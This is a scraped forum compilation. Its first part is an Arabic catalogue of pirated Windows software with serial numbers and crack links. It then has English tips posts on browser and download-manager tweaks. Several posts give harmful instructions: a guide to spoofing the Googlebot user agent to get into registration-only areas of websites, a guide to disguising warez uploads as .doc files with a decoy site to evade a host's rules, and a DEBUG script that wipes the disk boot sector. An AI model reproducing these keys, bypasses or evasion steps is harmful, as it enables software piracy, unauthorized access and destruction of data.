sn/ #93763176421934759356482953


للتحدث مع أكثر من واحد أو مع جماعة
HearMe VoiceContact v2.0
Only the registered members can see the link


برامج خدمة ملفات
لتجزئة الملف إلى ملفات صغيرة بإمكانك وضعها على القرص المرن وهو مفيد جداً في حال إنك تعمل مع الملفات الكبيرة الحجم ولا تستطيع وضعها على قرص مرن
Part it 2.03
Only the registered members can see the link
كراك:Only the registered members can see the link
name :dhafer s/n: PRT-F1B9A337-65C06874-6


أيضاً برنامج لتقطيع الملفات ولكنه يتميز عن سابقه بأنه لا يريد البرنامج نفسه لتجميع هذه الملفات وإنما يكفي نظام الويندوز لتركيبهم
1ToX File Spliter v2.57
Only the registered members can see the link
Name: dusko FirstName: nadia s/n:3684123256


برنامج متخصص وكامل مهمته تجزئة الملفات الكبيرة ويقسمها إلى أقسام تتناسب مع المكان التي سوف توضع فيه مثلاً قرص مرن أو بريد إلكتروني
KW_Split'Em v1.5
Only the registered members can see the link


يقسم الملفات الكبيرة إلى صغيرة ويشكل ملف تطبيقي لكي يجمعهم في مكان آخر
File Split PRO V4.6
Only the registered members can see the link
s/n: F863-1300-2390-EXJW-017-FY


لتسهيل التعامل مع الملفات بشكل عام
shellgem v 1.36
ftp://zdftp.zdnet.com/pub/private/s...es/shellgem.zip


كثيراً من الأحيان ما نقوم بحذف ملفات إلى السلة ونفرغ السلة وفيما بعد نكتشف بأن هذه الملفات مهمة جداً ولا نستطيع إرجاعهم إلا بواسطة هذا البرنامج
R4A v1.04
Only the registered members can see the link
Name: Mr_GReeN [WkT!] s/n: MW3XPC85TE3J


برنامج يتيح لك الاتصال هاتفيا بمن تشاء عن طريق الإنترنت
Free World Dialup
Only the registered members can see the link


اتصال بالهاتف عن طريق الإنترنت
WinPhone
Only the registered members can see the link


اتصال بالهاتف عن طريق الإنترنت
Really Easy Voice
ftp://download.really-easy.com/pub/revsetup.exe


لإظهار رقم هاتف الذي اتصل بك إذا كنت مشترك بهذه الميزة وهو فعال جداً
Call Display v1.0
Only the registered members can see the link


تستطيع أن تتصل بأي هاتف أو كمبيوتر في العالم عن طريق الإنترنت ولا تحتاج إلا لكرت الفاكس والمايكروفون ولا تحسب لك سوى دقائق إنترنت
PhoneFree v6.0
Only the registered members can see the link


أيضاً مثل سابقه مجاناً وللإتصال بأي دولة في العالم
HATF Telephone Software
Only the registered members can see the link


للتحث مع العالم الخارجي عبر الإنترنت
Internet phone
Only the registered members can see the link
sn/ V1Q7-SC97-NNNN-1X-0000-3BFF/A2BE


أيضاً بؤنامج للإتصال من جهاز الكمبيوتر إلى أي هاتف عبر الإنترنت وهو مجاني أيضاً
PC-to-Phone v2.1
ftp://194.165.206.9/pub/PC-to-Phone.exe


برنامج متكامل لإدارة الفاكس وهو برنامج تخصصي وشامل لكل الوظائف
WinFax Pro v10.0
Only the registered members can see the link
sn/231-6736-472-2928
كراك:Only the registered members can see the link


برنامج لإرسال واستقبال الفاكسات
Just The Fax v2.9y
Only the registered members can see the link
Name: Dhafer s/n: RKS-2600724


برنامج شبيه لسابقة وهو لإرسال واستقبال الفاكس
MightyFax v2.9y
Only the registered members can see the link
Name: TEAM DiSTiNCT s/n: RKS-5525013


وهذا البرنامج لوصل جهازين مع بعضهم لتبادل الملفات فيما بينهم
Zow v3.1
Only the registered members can see the link


برامج الصوت والصورة
برنامج مشهور جداً لقراءة الملفات الصوتية من الإنترنت وهو مهم جداً وغني عن التعريف
RealPlayer Plus8
Only the registered members can see the link
sn/ 1016-10-1160


برنامج جيد جداً إذ يدعم الكثير من اللواحق حتى التي يدعمها سابقه وذو واجهة جميلة كما يتميز ويعطيها رونقاً خاصاً مع تحكم واسع بموجات الصوت ويشغل فيديو أيضاًMp3 بقراءة ملفات
JetAudio 4.8
Only the registered members can see the link


برنامج تشغيل الفيديو الممتاز وبالنسبة لنا هو أفضل برنامج تشغيل فيديو على الإطلاق كما أنه يدعم لواحق صوتية أيضاً بالإضافة إلى ميزته المشهورة بأخذ لقطة من الفلم إلى صورة
Xing Player3.30
Only the registered members can see the link


RealProducer Plus G2
Only the registered members can see the link
sn/ 212-08806-1648


Real Player يقوم بالتحويل من كافة اللواحق الصوتية والصورية إلى ملفات ال
Real Juke Box V2
Only the registered members can see the link
sn/ 352-88760-1716


برنامج جميل جداً وهو أيضاً غني عن التعريف يتميز بسهولته وبدعمه للكثير من لواحق الملفات الصوتية الكثيرة
WinAmp Full v 2.75
Only the registered members can see the link


Mp3 لتحويل الملفات الصوتية مهما كانت بما في ذلك ملفا السيدي إلى للاحقة
MpegDJ Encoder v1.98b
Only the registered members can see the link
كراك:Only the registered members can see the link


وهو مفيد لتحويل الملفات إلى نغمات موبايل Midi إلى ملفات Wav هذا البرنامج يحول الملفات
Amidi 1.6
Only the registered members can see the link
كراك:Only the registered members can see the link


وهو برنامج ضخم جداً وقوي ومهمته رؤية الأفلام والملفات والتلفزيون الموجود على الإنترنت وهو من شركة أبل ماكينتوش ويمتاز عن غيره بسرعته الرهيبة بالتحميل من الإنترنت
Quick Time5
Only the registered members can see the link
Name: microke Company: wamadhat
S/N : PMME-GGQM-EMRU-UPE3-5678


منه وإليه Real Player هو برنامج تحويل ويتميز عن غيره بإمكانيته بنحويل ملفات
Streambox Ripper2009
Only the registered members can see the link
كراك:Only the registered members can see the link


برامج لنقل ملفات

لتعديل وحفظ الملفات بشكل سريع وبدون حاجة للبرمجة
SiteEZ v1.9
Only the registered members can see the link


لتحميل وحفظ الملفات ونقلهم إلى السيرفر ويمكنه المتابعة بالعملية إذا إنقطع الإتصال إذا كان السيرفر يدعم هذه الميزة ألا وهي متابعة الجلسة بعد الإنقطاع
FTP Voyager v8.0.0.2
Only the registered members can see the link
كراك:Only the registered members can see the link


برنامج لنقل الملفات من وإلى السيرفر
LeapFTP v2.7.1
ftp://ftp1.enet.com.cn/pub/game/too...ork/lftp271.exe
Name: Dhafer Al-holaisi s/n: 214065-49410835290


الجميع يعملون مع هذا البرنامج لبساطته
AceFTP V 1.31
ftp://visicom.superb.net/aftp131.exe
Name: CZY s/n: 673JLA-VPAM85-FT74N7-L5643E


البرنامج الأفضل لأنه يحوي جميع الميزات الكطلوبة وهو يفيد الخبراء ننصح به بشدة
WS_FTP Pro v7
Only the registered members can see the link


لنقل الملفات إلى السيرفر على الشبكة بمميزات هائلة
3D-FTP 3.0 beta1
ftp://ftp.3dftp.com/pub/3dftp3b1.zip
s/n: 3D-A563E9-NL2Q72


برامج لتصميم المواقع

يحتوي على موثرات جافا جاهزة
Applet FX Freeware v1.1
ftp://ftp.unina.it/pub/Pcibm/winsit...til/afxfe11.exe


محرر صفحات الإنترنت المشهور وهو الأفضل دائما من شركة مايكروسوفت
FrontPage2000
ftp://gatekeeper.dec.com/pub/micro/...1stpage2000.exe
sn/ GC6J3-GTQ62-FP876-94FBR-D3DX8


برنامج لتحرير الصفحات وهو متكامل وليس به أي عيب كما إنه يدعم العربية
DreamWaver4
Only the registered members can see the link
كراك:Only the registered members can see the link
s/n: DWW400-03771-57289-73501


آلة حاسبة علمية متخصصة
Calc98 v4.52
Only the registered members can see the link


برنامج لكشف كلمات السر التي هي عبارة عن نجوم
Alhajisstars
Only the registered members can see the link


برنامج لنطق الكلمات التي تكتبها بعدة أصوات تختارها وهو برنامج رائع جداً
Talk
Only the registered members can see the link


لمعرفة التوقيت العالمي في أي مكان
ActiveEarth
Only the registered members can see the link


وهو لإضافو وظائف على الأزرار في لوحة المفاتيح
Hotkeys
ftp://zdftp.zdnet.com/pub/private/s...es/hotkey95.zip


هذا البرنامج يعطيك عدسة تقوم بتكبير جزء من أجزاء سطح المكتب إلى مضاعفات كثيرة وبدقة عالية
Lens v1.31ftp://zdftp.zdnet.com/pub/private/sWlIB/utilities/desktop_accessories/lensmagn.exe


هذا البرنامج يقوم بترجمة القوائم للبرامج الأجنبية إلى قوائم عربية لكي يسهل العمل معها
RC-WinTrans v6.0
Only the registered members can see the link


ملفات مهمة لتنفيذ برامج فيجوال بيسيك على أي جهاز لا يحوي الفيجوال بيسيك فيه
VB6 Runtime Files
Only the registered members can see the link


أفضل برامج تصميم الخطوط
ScanFont v313
ftp://zdftp.zdnet.com/pub/private/s...ools/scnfnt.zip
كراك:Only the registered members can see the link


مشغل ألعاب السوني بلاي ستايشن الجديد ويعمل على الإنتل
Bleem15b
Only the registered members can see the link
Intel


AMD مشغل ألعاب السوني بلاي ستايشن الجديد ويعمل على
Bleem15b
Only the registered members can see the link


برنامج صانع الشعارات
LogoMaker
Only the registered members can see the link


يمكنك زيادة الصور والنغمات للخليوي عن طريق هذا البرنامج ومن مميزاته أنه يمكنك من سماع النغمة قبل تحميلها ويدعم النغمات الطويلة جداً
LogoManager 1.2.3
Only the registered members can see the link
كراك:Only the registered members can see the link


لمن لم يعجبه البرامج السابقة في تشغيل السوني بلاي ستايشن
ps2
Only the registered members can see the link


لتعريب البرامج الغير معربة
ResHack
Only the registered members can see the link
_________________
Best Regards,
Mahmoud Hany,
Country: Egypt,
Title: IT instructor,
Mobile: 0106354485

View user's profile Send private message
blackwood
Kiddie
Kiddie


Joined: 21 Sep 2004
Posts: 22
Location: Egypt

PostPosted: Thu Nov 18, 2004 1:26 pm Post subject: Continue........... Reply with quoteBack to top
لتعريب البرامج الغير معربة
ResHack
Only the registered members can see the link
ملف التعريب:Only the registered members can see the link


قاعدة بيانات ضخمة تحوي الآلاف من الأرقام التسلسلية للبرامج العديدة الموجودة ننصح به بشدة فإذا لم تجد رقم برنامج ما فإنك سوف تجده هنا بالإضافة إلى أن به محرك بحث عن الأرقام التسلسلية والشوارخ في الإنترنت كلها إذا لم تجد طلبك فيه فوراً
serial cracker
Only the registered members can see the link


برامج اتصالات
برنامج صغير لإرسال وإستقبال الفاكسات كما أنه يدعم اللغة العربية تماماً ويوجد به ميزة أخرى بأنه يستطيع إرسال فاكسات إلى البريد الإلكتروني
Fax2000
Only the registered members can see the link
sn/ J1018200381


برنامج رائع جداً وهو يمكن المستخدم من وصل جهازه مع جهاز آخر على أن يتواجد نفس البرنامج مما يمكن من جلب سطح مكتب الكمبيوتر المضيف إلى جهازك لترى أدق التفاصيل الممكنه في الجهاز المضيف كما أنك تستطيع الولوج إلى شبكة الإنترنت إذا كان هذا الكمبيوتر المضيف داخل إلى اللإنترنت كما بإمكانك نسخ الملفات وإعطاؤه ملفات أخرى أثناء فتح جلسة عمل كما بإمكانك إنشاء مستخدمين في الكمبيوتر المضيف وإعطائهم صلاحيات كما لو أنك في نظام تماماً ستفاجأ بأنك عند تحريك الماوس من جهازك سوف تتحرك نفس الحركة في الكمبيوتر المضيف NT ويندوز
LapLink2000
Only the registered members can see the link
sn/ L95-SSSS-994001-75B


وهو برنامج عملي وفعال لآله الرد التلقائي على الهاتف كما أنه يمكن أن يميز صوت الفاكس عند فتح الفاكس من جهة الإتصال لكي يحول الطلب إلى مستلم الفاكس أو أي برنامج آخر
Advanced Call Center
Only the registered members can see the link
كراك:Only the registered members can see the link


برنامج عملي لإرسال وإستقبال الفاكسات يمكن أن يتشارك مع برامج أخرى كالوورد
MightyFax2.9Win98
Only the registered members can see the link
Name : wamadhat visitor Serial : RKS-7996413


برنامج يساعد علي الكتابة بالعربية في البرامج التي لايمكن الكتابة بالحروف العربية بها مثل الفلاش وغيره وللتعرف اكثر على مميزات هذا البرنامج ولمزيد من الشرح
Only the registered members can see the link


Swish v1.51
برنامج رسم جديد ينافس برنامج الفلاش وتستطيع الاطلاع اكثر على مميزات هذا البرنامج ولمزيد من الشرح
Only the registered members can see the link


RealPlayer 7 Plus
ريل بلير الصدار السابع من اشهر البرامج المستخدمة التي تتيح لك مشاهدة الصور التلفزيونية وكذلك سماع الصوت من خلال الانترنت رقم التسجيل سوف تجده مع الملف ولمزيد من الشرح
Only the registered members can see the link


RealPlayer 8 Plus
نسخة جديدة من هذا البرنامج وهو من اشهر البرامج المستخدمة التي تتيح لك مشاهدة الصور التلفزيونية وكذلك سماع الصوت من خلال الانترنت ولمزيد من الشرح
Only the registered members can see the link


GoldWave 32-bit v4.21
برنامج جولد وايف وهو برنامج يقوم بعمل تسجيلات صوتيه وبدقة ممتازة ولمعرفة المزيد عن هذا البرنامج ولمزيد من الشرح
Only the registered members can see the link


Ulead MediaStudio Pro 6.0
تحرير الفيديوالمتقدم أداة سهلة وغير معقدة تمكنك من عمل عروض فيديو صوت وصورة في منتهى القوة والجودة ولمزيد من الشرح
Only the registered members can see the link


RealProducer Plus G2
هذا البرنامج يستخدم لتحويل نسق الملفات التالية : AVI, MOV, QT, WAV, AU, MPG إلى ملفات RealPlayer الصوتيه أو الفيديويه، كذلك يمكن بواسطة هذا البرنامج عمل صفحات ويب صوتية وفيديوية بكل سهولة ولمزيد من الشرح
Only the registered members can see the link


SoundForge 4.5h
تستطيع بواسطة هذا البرنامج من نقل الصوت من الكاسيت الى الكمبيوتر ومن ثم الى الانترنت ولمزيد من الشرح
Only the registered members can see the link


Macromedia Dreamweaver 3
مصمم صفحات مميز وقوي ولمزيد من الشرح
Only the registered members can see the link


Windows Media On-Demand Producer V4.0.0.85
برنامج لتحويل صيغ WAV و AVI إلى صيغة أخرى لنشرها على الويب بسرعة وسهولة ولمزيد من الشرح
Only the registered members can see the link


Edit Plus 2.01b
برنامج ممتاز لتحرير النصوص وصفحات الانترنت ولمزيد من الشرح
Only the registered members can see the link


FrontPage Xpress
محرر صفحات ويب يدعم اللغة العربية ولمزيد من الشرح
Only the registered members can see the link


Nero Burner 5.0.3.1
تستطيع بهذا البرنامج تحويل ملفات (MP3) الى ملفات (CDA) أي الى اسطوانات سمعية يمكن تشغيلها بمشغل السي دي الموجود بالسيارة ولمزيد من الشرح
Only the registered members can see the link


Photo-Brush V1.3c
برنامج رسومي ممتاز ورائع يساعدك على وضع لمسات جمالية على الصورة ويجعلك تتحكم بها من خلال الادوات المتوفرة مع البرنامج ويتعامل مع النص العربي ولمزيد من الشرح
Only the registered members can see the link


PicaView v1.32
برنامج لاستعراض الصور بالضغط بز الماوس الايمن ولمزيد من الشرح
Only the registered members can see the link


كيف تهيء جهازك للانترنت
كيف تتصفح الانترنتOnly the registered members can see the link


شرح كيفية أعداد بريد HOTMAIL على برنامج الأوت لوك
Only the registered members can see the link


شرح كيفية أضافة العناوين الى بريدك
Only the registered members can see the link


شرح طريقة تركيب الubb
Only the registered members can see the link


كيفية استخدام الماسحة
Only the registered members can see the link


كيفية أرسال رسالة بها صورة يشاهدها المستقبل عند فتح الرسالة
Only the registered members can see the link


شرح كيف تفحص جهازك من الفيروسات عن طريق الأنترنت
Only the registered members can see the link


شرح كيفية الأتصال من موقع hottelephone
Only the registered members can see the link


كيفية إرسال وإستقبال الفاكس عن طريق جهاز الكمبيوتر
Only the registered members can see the link


برامج انترنيت

إن هذا البرنامج يقوم بمساعدتك في تحميل الملفات من على الشبكة بطريقة سريعة وآمنة حيث بإمكانه متابعة تنزيل هذا الملف إذا قطع الإتصال بدون العودة لتحميله من جديد ويمكن إدارة الملفات الواجب تحميلها بداخله ويغلق الجهاز لوحده بعد التكميل إن أحببت
GetRight (32-bit) v4.5
Only the registered members can see the link
s/n: 146647922132

فيروسات خطيرة ادخل هنا ،، وربنا يستر
Only the registered members can see the link

Master
29-04-07, 09:31
Exploseek, a simple tool to find music on the net

Why should I use Exploseek ?

Exploseek is a nice simple tool to find music on the net. It is possible to use the major search engines to type your queries, but if you use this tool it will be much easier as some of you have probably seen already. We always try to improve the queries, if possible, and will update it at random times. Further you don't need to install a peer-to-peer program with possible spyware and other security issues, the price to pay is that you will not always find as much as such a program, but on a lucky day you find a load of music.



Only the registered members can see the link

Master
29-04-07, 09:31
Find Stuff

Has this ever happened to you?

You're looking for something on a long web page with Internet Explorer or Netscape. You think it's there, but you're faced with seemingly insurmountable number of paragraphs, sentences, and words to hunt though.

Well, next time this happens to you, hit the Edit menu, Find (or CTRL-F for you shortcut lovers). You'll get a handy little "find" box that lets you type in a specific word. After you type in your search term, hit the Find Next button and Explorer will look for that word on the page. If it's successful, you'll be zapped right to it.

As if that wasn't cool enough, you can also use a variation of this tip in Windows Explorer. Next time you're looking for a file in Explorer, hit CRTL-F and you'll get a Find or Search box (depending on what flavor of Windows you're using).

If you are already in the area of your hard drive where you think the file is (say, My Documents), hit CTRL-F and your search will be set to look in the My Documents sfolder.

Master
29-04-07, 09:32
Finding Missing Files From A Release


I hope this hasn't been submitted before, but i did a search and didn't find anything so here goes.
Have you ever downloaded a game/app/movie/... and when it was finished, you find out that are some missing files or corrupt ones?
Well here's a way to find those files:
--> Only the registered members can see the link

This is a service that works through irc (so mirc (or another) must be installed to use it).
You go on the specific channel (manually or by clicking one of the direct links on the site) and then "ask" for the specific file.
When there's someone out there who has it, it will be send to you automatically
If not, the file request shall be put on a queu list untill someone that has it, has sent it to the person that requested it.
!!! Obey the rules though, if not you can be banned from the channel and in severe cases your provider can be banned so others won't be able to use this !!!

I hope this can help out some people here, who have experienced/will experience this

Master
29-04-07, 09:33
Yes, firefox is already pretty damn fast but did you know that you can tweak it and improve the speed even more?

That's the beauty of this program being open source.
Here's what you do:
In the URL bar, type “about:config” and press enter. This will bring up the configuration “menu” where you can change the parameters of Firefox.

Note that these are what I’ve found to REALLY speed up my Firefox significantly - and these settings seem to be common among everybody else as well. But these settings are optimized for broadband connections - I mean with as much concurrent requests we’re going to open up with pipelining… lol… you’d better have a big connection.

Double Click on the following settins and put in the numbers below - for the true / false booleans - they’ll change when you double click.

Code:
browser.tabs.showSingleWindowModePrefs – true
network.Only the registered members can see the link – 48
network.Only the registered members can see the link – 16
network.Only the registered members can see the link – 8
network.Only the registered members can see the link – 4
network.Only the registered members can see the link – true
network.Only the registered members can see the link – 100
network.Only the registered members can see the link – true
network.Only the registered members can see the link – 300


One more thing… Right-click somewhere on that screen and add a NEW -> Integer. Name it “nglayout.initialpaint.delay” and set its value to “0”. This value is the amount of time the browser waits before it acts on information it receives. Since you’re broadband - it shouldn’t have to wait.

Now you should notice you’re loading pages MUCH faster now!

Master
29-04-07, 09:34
Frequently Asked Questions

For most updated content, visit our website

Q: What is FXP?
A: FXP is a term adopted by earlier clients which provided site to site FTP transfers.

Q: When trying to transfer files from one site to another I keep getting this error 500 illegal port command.
A: The FTP Server is set up to not allow or doesn't support FXP. Located in the Site Manager on the Advanced tab, you will find the option "alternative fxp method". By enabling upload/download (depending on the direction of the transfer), you may be able to get the server to allow FXP. Note: It is common for some sites to only allow FXP in one direction and not the other. By enabling alternative fxp method, this problem is sometimes solved.

Q: Why do I keep getting this message: "Only client IP address allowed for PORT command" when trying to FXP?
A: The FTP Server is set up to block FXP. In most cases using alternative fxp method doesn't solve this problem.

Q: I've tried everything but I can't get a site to site transfer to work, what is wrong?
A: Site to site transfers are not supported by some software/hardware configurations. Often, this is due to an incompatibility with NAT (Network Address Translation). NAT is not aware of site to site transfers and when it detects you are attempting to transfer a file, it modifies the FTP protocol to match your local "inside" IP. Several users have reported that Microsoft Internet Sharing is not compatible.

Q: Why can't I see any files? I can see them in other ftp clients.
A: There are two possible reasons.
1. You are behind a firewall and the FTP server is unable to connect to your computer. To resolve this issue you need to use Passive mode. This option is located in Preferences on the Proxy tab. Check "Use Passive mode".
2. The files may be hidden on the ftp server, and in order to see them you need to change the list method. This is located in Preferences on the Options tab. Change the List method to show hidden files. Note: some sites don't allow you to view hidden files and will result in an error. To resolve this problem, go into the Site Manager, select the site and click the advanced tab. Uncheck "show hidden files", then save to keep the changes

Q: I can't see the toolbar icons or the icons are messed up.
A: This problem happens on Windows 95 systems when the \Windows\System\ComCtl32.dll file is out of date. This DLL is responsible for drawing the toolbar buttons and their images. You can download the latest version from this link: MS Common Control Update!

Q: When FXPing why doesn't FlashFXP show a file progress, transfer speed or how much time is remaining?
A: The FXP protocol (site to site) doesn't provide any means of measurement. After one file is FXPed, FlashFXP attempts to estimate the remaining time for the next file and total remaining time for all files in the queue.

Q: Will FlashFXP ever support connecting to more then 2 sites?
A: FlashFXP was designed to provide very easy access and usability to the site to site feature. Allowing more than two would only complicate things. For now let's stick with 2.

Q: Why doesn't FlashFXP support Squid?
A: FlashFXP v1.3 now supports it.

Q: Why doesn't FlashFXP download Only the registered members can see the link urls from the clipboard?
A: FlashFXP is not a browser or a web download manager. For FlashFXP you need to use the ftp addresses.

Q: Is it possible to import site lists from another FTP clients?
A: Yes, You can import other site lists into FlashFXP from the Site Manager by right-clicking on the site list and selecting Import from the menu.

Q: FlashFXP looks confusing, All I want to do is download and upload files. I don't need site to site transfers.. help!?!
A: We have just the thing for you, With a click of the mouse FlashFXP can transform into your normal looking FTP client. From the main menu select View then click FTP Only. You can always uncheck this later to bring back the power of site to site transfers.

Q: I use ZipMagic and now all of my zips appear as folders in FlashFXP, how can I make the zips appear as zips?
A: You need to make one small change in the ZipMagic Properties window. First, click the Start Menu, then go to Programs|ZipMagic 4.0|ZipMagic Properties. Click the "Zip Folders" button, then click the "Applications" button. Then just add FlashFXP to the list of applications that sees zip files as files.

Q: I purchased FlashFXP v1.x-1.3 and my key doesn't work for v1.4-v2.0!
A: The key format was changed starting with version 1.4. You will need to email support@flashfxp.com and request a new one. New keys are provided free of charge.

Master
29-04-07, 09:34
Flashget Broadband Tweak

Just double-click on the FlashGetRegTweak.reg file to enter the tweak into the registry. This tweak will allow up to 100 simultaneous file downloads, each split into a max of 30 parts. Previous defaults were 8 & 10 respectively.

Note:

1. Works for dialup but not really advantageous.
2. Restart your computer to feel the full advantage of this tweak.

Download:
here it is
just copy to notepad
rename to Iwillsinglehandedlykillallthebandwidthfromtheserve rsidownloadfrom.reg


REGEDIT4

[HKEY_CURRENT_USER\Software\JetCar\JetCar\General]
"Max Parallel Num"="100"
"MaxSimJobs"="100"

Master
29-04-07, 09:35
1ST -> DOWNLOAD THIS: Only the registered members can see the link

THEN:
Opera5&6 & Netscape6.x, 7.x, Mozilla 1.x and Mozilla Firefox 0.x
Please download FlashGet Opera Plug-in 1.1. Install this plug-in into ...\Opera\Plugins or ...\Netscape6\Plugins or ..\Mozilla\Plugins or ..\FireFox\plugins directory.

Netscape 6 does not support the same click monitoring methods used by FlashGet with previous versions of Netscape. They left out the features that have been there since Netscape Version 1.0. For now, you must either:
Right click the links and do "Copy Link Location".
Or, the plugins used for FlashGet's Opera click monitoring do work in Netscape--with some quirks and differences from the other click monitoring. Just install FlashGet's Opera plugins into the ...\Netscape\Plugins directory.

Menuitem "Download by FlashGet" in Mozilla FireFox
FlashGot is an extension for integrating FlashGet and Mozilla Firefox 0.9 or later. It is available on Mozilla Update. Note that some antivirus software may incorrecly claim that it has a virus, as it uses Visual Basic Script (.vbs) files when integrating with Internet Explorer. Thanks Giorgio Maone.

Menuitem "Download by FlashGet" in Opera
see How Customizing Opera's context-menus.

Opera 7
Install this plug-in into ...\Opera7\Plugins and enable it in Opera(Menu->File->Preferences...)


NetCaptor
Must use monitor method 2 in FlashGet(default setting), also need enable "Brower help object" in netcaptor options/general.



2: MENU ITEM -> DOWNLOAD USING FLASHGET!!!


Customizing Opera's context-menus
=================================
Build #040912



What's this about?
~~~~~~~~~~~~~~~~~~
Using Opera 7.x one is able to customize the rightclick menus. That in
mind it's possible to add a menu item for "Download using FlashGet".
First you need to know, that every kind of menu entry in Opera is
saved as plaintext in standard_menu.ini in the Opera defaults folder
(normally C:\Program Files\Opera7\defaults). So, we need to modify this
file in order to add our FlashGet menu extension.



Requirements
~~~~~~~~~~~~
- Opera 7.0 or above
- FlashGet 1.60 or above



Here we go!
~~~~~~~~~~~
1) Get the folder where Opera is installed. See the registry at

[HKLM\SOFTWARE\Netscape\Netscape Navigator\5.0, Opera\Main]
"Install Directory"="C:\\Program Files\\Opera7"

From here on I will use %opera% instead of the whole path we got
from the registry since we need to save this info into a variable
to use it in our program.

ATTENTION! Be sure to not use this variable in any files we modify!
Always use the whole path we got from the registry. Otherwise it
will mess up your Opera installation!


2) Goto this folder and copy

%opera%\defaults\standard_menu.ini

to

%opera%\profile\menu\standard_menu.ini


3) Open this file with a text editor and change the following:

- change the name (line 7) into "Opera Standard with FlashGet extension"
- search for the categories

"[Link Popup Menu]" and "[Image Link Popup Menu]"

and add the following line to both categories:

Item, "Download using FlashGet" = Execute program, "C:\Program Files\FlashGet\flashget.exe","%l"

That is a lowercase L after the last %

- save the file and start Opera


4) Goto "File/Preferences/Toolbars and Menus". In newer versions
it's called "Extra's/Preferences/Toolbars and Menus" and highlight
the new entry "Opera Standard with FlashGet extension" in the field
"Menu setup"


5) Press "OK" and that's it! Now you can download link-targets (both
text- AND image-links) by right-clicking on a link and choose
"Download using FlashGet".



Hint:
~~~~~
You can skip 4) and 5) if you add the following line into section [User Prefs]
of the file %opera%\profile\opera6.ini

Menu Configuration=%opera%\profile\menu\standard_menu.i ni

This can easily be done using Nullsoft's NSIS Installer 2.0.
Get it from Only the registered members can see the link

Master
29-04-07, 09:35
PCStats have a new advanced guide out for flashing your video card BIOS! While this *not* something for the novice to undertake, flashing your video card BIOS may lead to performance and feature enhancements.

We recently ran an article on flashing (reprogramming) the BIOS (Basic Input/Output System) of your motherboard to enable new features and fix errors. That got us thinking that we'd only covered half the story. Sure, hardware enthusiasts have been upgrading the BIOS on their motherboards for years, but what about the other components of a computer system?

Here's a snap:

Video cards in particular have an interesting history in relation to the BIOS flashing procedure. While motherboard BIOS fixes generally add support for new processors and fix hardware glitches, video card BIOS updates have the potential to do much more. Enterprising tech-heads have discovered instances where a video card can actually be transformed by a BIOS update, activating hidden features and potential buried performance aspects by the manufacturer (generally for marketing purposes).


Click here for the full guide:

Only the registered members can see the link


--------------------------------------------------------------------------------------------------------

Master
29-04-07, 09:36
This was originally posted by andro11meda in Hardware and Networking Support. It worked so well for me on a problem-computer that I was working on that I had to post it in tutorials. Thanks andro11meda!!


***
This is my favorite way to wipe it clean:

CAUTION: This debug script is for advanced users only. Its Purpose is to remove all formatting and partitioning information from your hard disk when FDISK is unable to do so. THIS WILL REMOVE ALL DATA AND PROGRAMS FORM THE DRIVE.

1. Create a MSDOS bood disk with Debug

2. At DOS command prompt type the following: Debug[Enter] (Where enter is to press the enter key once)

NOTE: Type the following bolded text only. You will recieve an error if you type anything other than the bold text. The non-bolded text represents what will appear on you screen once you press [Enter] after each command.

-F 200 L1000 0 [Enter]
-A CS:100 [Enter]
xxxx:0100 MOV AX,301 [Enter]
xxxx:0103 MOV BX,200 [Enter]
xxxx:0106 MOV CX,1 [Enter]
xxxx:0109 MOV DX,80 [Enter]

NOTE: ( --- "80" for hd0, "81" for hd1)

xxxx:010c INT 13 [Enter]
xxxx: 010e INT 20 [Enter]
xxxx: 0110 [Enter]

-G [Enter]
"Program terminated normally"

3. Turn off the computer. On the next startup the hard drive will need to be partitioned and formatted.
***

Master
29-04-07, 09:36
Free Access To Websites Without Registering

Go to

-Only the registered members can see the link

and type the URL of the website you want to log into.
Examples:

-Only the registered members can see the link -Only the registered members can see the link
etcetera.

Another (and better) way is changing the user agent of your browser to:
Googlebot/2.1+

-Only the registered members can see the link

This is very easy in Mozilla's Firefox. Download and install the User Agent Switcher from

-Only the registered members can see the link
and add the Googlebot user agent.

Have fun, Dead Dreamer!

-]Edit[- Now this kicks ass, was just browsing entire forum without even needing to login to view restricted areas, and it works on other sites
And no, you cant access the hidden forums either, already tried that

Master
29-04-07, 09:37
FREE Hosting For WAREZ

Tutorial: Free Hosting For Warez (how to do it...)
By: darkraven (aka bobbasic)
Level: Average (takes time)

Place to stick your warez and how to do it.
if you have a file you wish to upload and its too large for a free webhost and you still want it online try this method.

Only the registered members can see the link download rar and cut the file up into 1MB files.
Mass Rename them to .doc (i forgot how to do it but its via CMD)
Only the registered members can see the link sign up for the free hosting, which has unlimited bandwidth and space with a REAL (yet not your main) hotmail account.
Upload the files via FTP

Goto Only the registered members can see the link
and tell people the link ie. Only the registered members can see the link - blah100.doc
Use Flashget to download!

And there you have it, as long as the people on hostultra dont find your site your fine icon_razz.gif


Downsides:
hostultra only allows max file size of 1MB files.
hostultra does not allow .exe or .mp3

Hostultra:
Unlimited Data Transfer
Unlimited Disk Space
100mbps Network Connection
99.9% Uptime
Free Sub Directory ( hostultra.com/~you )
Cool yourname.vzz.net URL!
Free Subdomains ( Many domains to choose from! )
Free Domain Hosting ( yourdomain.com )
Custom Domain DNS Control ( A/CNAME/MX Records )
Browser and FTP Uploading
PHP / MySQL*
Unlimited Domains / Unlimited Subdomains
Free Search Engine Submission

Terms Of Use For HostUltra
# In addition to the above, User shall not upload onto their hostultra web space any of the following:

1. audio or video files of any type this includes but is not limited to .wma .wmv .wav .mp3 .avi .mpg .asf .mov (however flash and midi files are allowed);
2. spanned archives such as such as .z01 .rar .ace;
3. any binary files that are not linked to an html page on the Site;
4. sites which contain only (or mostly) downloadable files;
5. download sites of any kind, including but not limited to, shareware, freeware, trialware, demos, warez, appz, gamez, iso, cracks;
6. photo albums, image galleries or TGPs;

(THOUGH WHOS LISTENING TO THE RULES?!)

to make it less likely hostultra will delete your account, add a fake little site on there, like a few pages of crappy html about some stupid thing which has nothing to do with warez. (ie. bob's site)

Master
29-04-07, 09:37
Free Hosting

Unlimited Bandwidth
Unlimited Webspace
Domain Hosting
PHP, FTP
Price: FREE!

there Free Web Hosting Package contains the following features:
Unlimited Data Transfer
Unlimited Disk Space
100mbps Network Connection
99.9% Uptime
Free Sub Directory ( hostultra.com/~you )
Cool yourname.vzz.net URL!
Free Subdomains ( Many domains to choose from! )
Free Domain Hosting ( yourdomain.com )
Custom Domain DNS Control ( A/CNAME/MX Records )
Browser and FTP Uploading
PHP / MySQL*
Unlimited Domains / Unlimited Subdomains
Free Search Engine Submission

Only the registered members can see the link

